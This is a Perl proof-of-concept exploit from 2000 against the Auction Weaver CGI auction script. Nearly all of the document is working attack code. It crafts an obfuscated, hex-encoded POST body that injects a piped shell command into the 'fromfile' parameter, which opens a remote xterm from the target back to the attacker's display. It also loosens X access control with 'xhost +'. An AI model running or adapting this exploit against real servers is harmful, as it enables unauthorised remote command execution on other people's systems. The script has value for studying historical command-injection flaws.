#!/usr/bin/perl -w ## Auction Weaver 1.02 / Only confirmed with LITE ## - Proof of Concept exploit - ## ## CGI Script Center have just released an update ## of Auction Weaver due to security reasons - I ## suggest that you spend some more time securing ## it, and the other scripts - It is really needed. ## ## This exploit will spawn a xterm from $target ## to $attacker. All versions of Auction Weaver ## below 1.02 is exploitable. ## ## This exploit will not work on hosts running ## Auction Weaver on NT, due to the xterm call. ## ## CGI Script Center, please contact me if you need ## help with securing your scripts... ## ## teleh0r@doglover.com / anno 2000 ## http://teleh0r.cjb.net use strict; use Socket; if (@ARGV < 3) { print("Usage: $0 \n"); exit(1); } my($target,$attacker,$dpy,$length,$cgicode, $agent,$sploit,$iaddr,$paddr,$proto); ($target,$attacker,$dpy) = @ARGV; if ($dpy !~ /\d/) { print("dpy must be a number, probably 0\n"); exit(1); } print("\nRemote host: $target\n"); print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n"); print("Command: xterm -ut -display $attacker:$dpy\n\n"); system("xhost + $target"); $length = 362 + length($attacker.$dpy); # elite & stealty cgicode...heh! $cgicode = "\%66\%6c\%61\%67\%31=\%31&\%66\%72\%6f\%6d\%66". "\%69\%6c\%65=\%7C\%78\%74\%65\%72\%6d+\%2d\%75". "\%74+\%2d\%64\%69\%73\%70\%6c\%61\%79+$attacker". ":$dpy\%7C&\%70\%6c\%61\%63\%65\%62\%69\%64=\%31". "&\%63\%61\%74\%64\%69\%72=\%63\%61\%74\%31&\%75". "\%73\%65\%72\%6e\%61\%6d\%65=\%74\%65\%6c\%65\%". "68\%30\%72&\%70\%61\%73\%73\%77\%6f\%72\%64=\%6". "f\%68\%62\%61\%62\%79&\%62\%69\%64=\%49\%68\%61". "\%76\%65\%6e\%6f\%6d\%6f\%6e\%65\%79&\%6e\%6f\%". "62\%69\%64\%69\%74\%65\%6d=\%31&\%73\%62\%75\%7". "4\%74\%6f\%6e=\%42\%49\%44"; # old & boring code #"flag1=1&fromfile=%7Cxterm+-ut+-display+$attacker%3A". #"$dpy%7C&placebid=1&catdir=cat1&username=teleh0r&pas". #"sword=ohbaby&bid=Ihavenomoney&nobidite=1&sbutton=BID"; $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)"; # The path to auctionweaver.pl may of course need to be changed. $sploit= "POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: $length $cgicode"; $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); sleep(3); system("xhost - $target"); print("\nAll done - hopefully you got the flying xterm!\n"); exit(0) # www.hack.co.za [7 September 2000]#